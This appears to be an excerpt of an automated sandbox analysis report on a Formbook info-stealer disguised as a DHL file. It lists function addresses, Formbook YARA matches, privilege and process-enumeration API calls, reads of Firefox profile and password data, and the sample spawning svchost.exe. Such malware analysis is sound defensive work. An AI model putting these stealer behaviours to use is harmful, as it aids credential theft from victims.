            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE44202_2_03AE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABEFA02_2_03ABEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE2F302_2_03AE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADCD1F2_2_03ADCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A856302_2_03A85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B095C32_2_03B095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE1AA32_2_03AE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A03FD22_2_03A03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A03FD52_2_03A03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E702C04_2_02E702C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E902744_2_02E90274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB03E64_2_02EB03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFE3F04_2_02DFE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAA3524_2_02EAA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E820004_2_02E82000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA81CC4_2_02EA81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB01AA4_2_02EB01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA41A24_2_02EA41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E781584_2_02E78158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE01004_2_02DE0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8A1184_2_02E8A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0C6E04_2_02E0C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DEC7C04_2_02DEC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF07704_2_02DF0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E147504_2_02E14750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E9E4F64_2_02E9E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA24464_2_02EA2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E944204_2_02E94420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB05914_2_02EB0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF05354_2_02DF0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DEEA804_2_02DEEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA6BD74_2_02EA6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAAB404_2_02EAAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E1E8F04_2_02E1E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD68B84_2_02DD68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF28404_2_02DF2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFA8404_2_02DFA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EBA9A64_2_02EBA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF29A04_2_02DF29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E069624_2_02E06962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAEEDB4_2_02EAEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E02E904_2_02E02E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EACE934_2_02EACE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF0E594_2_02DF0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAEE264_2_02EAEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE2FC84_2_02DE2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFCFE04_2_02DFCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E6EFA04_2_02E6EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E64F404_2_02E64F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E32F284_2_02E32F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E10F304_2_02E10F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E92F304_2_02E92F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE0CF24_2_02DE0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E90CB54_2_02E90CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF0C004_2_02DF0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DEADE04_2_02DEADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E08DBF4_2_02E08DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFAD004_2_02DFAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8CD1F4_2_02E8CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E912ED4_2_02E912ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0B2C04_2_02E0B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF52A04_2_02DF52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E3739A4_2_02E3739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DDD34C4_2_02DDD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA132D4_2_02EA132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA70E94_2_02EA70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAF0E04_2_02EAF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF70C04_2_02DF70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E9F0CC4_2_02E9F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFB1B04_2_02DFB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EBB16B4_2_02EBB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E2516C4_2_02E2516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DDF1724_2_02DDF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA16CC4_2_02EA16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E356304_2_02E35630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAF7B04_2_02EAF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE14604_2_02DE1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAF43F4_2_02EAF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8D5B04_2_02E8D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA75714_2_02EA7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E9DAC64_2_02E9DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E35AA04_2_02E35AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8DAAC4_2_02E8DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E91AA34_2_02E91AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E63A6C4_2_02E63A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFA494_2_02EAFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA7A464_2_02EA7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E65BF04_2_02E65BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E2DBF94_2_02E2DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0FB804_2_02E0FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFB764_2_02EAFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF38E04_2_02DF38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E5D8004_2_02E5D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF99504_2_02DF9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0B9504_2_02E0B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E859104_2_02E85910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF9EB04_2_02DF9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB3FD24_2_02DB3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DB3FD54_2_02DB3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF1F924_2_02DF1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFFB14_2_02EAFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFF094_2_02EAFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFCF24_2_02EAFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E69C324_2_02E69C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0FDC04_2_02E0FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA7D734_2_02EA7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF3D404_2_02DF3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA1D5A4_2_02EA1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_006115E04_2_006115E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0060C7C74_2_0060C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0060C7D04_2_0060C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0060C9F04_2_0060C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0060AA704_2_0060AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_006130EE4_2_006130EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_006130F04_2_006130F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00629FD04_2_00629FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BFA0AF4_2_02BFA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BFB8B44_2_02BFB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BFB9D64_2_02BFB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BFADD84_2_02BFADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BFBD6C4_2_02BFBD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 110 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E5EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02DDB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E25130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E6F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E37E54 appears 110 times
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: String function: 00C28900 appears 42 times
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: String function: 00C07DE1 appears 35 times
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: String function: 00C20AE3 appears 70 times
            Source: DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003FAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 30312052024.exe
            Source: DHL 30312052024.exe, 00000000.00000003.1385174657.0000000003E53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 30312052024.exe
            Source: DHL 30312052024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/7
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6A06A GetLastError,FormatMessageW,0_2_00C6A06A
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C581CB AdjustTokenPrivileges,CloseHandle,0_2_00C581CB
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C587E1
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C6B3FB
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C7EE0D
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C6C397
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C04E89
            Source: C:\Users\user\Desktop\DHL 30312052024.exeFile created: C:\Users\user\AppData\Local\Temp\autF93E.tmpJump to behavior
            Source: DHL 30312052024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000003.1726150757.000000000288B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3800906061.00000000028AF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1724459027.0000000002882000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1724324281.0000000002861000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3800906061.0000000002882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 30312052024.exeReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL 30312052024.exe "C:\Users\user\Desktop\DHL 30312052024.exe"
            Source: C:\Users\user\Desktop\DHL 30312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 30312052024.exe"
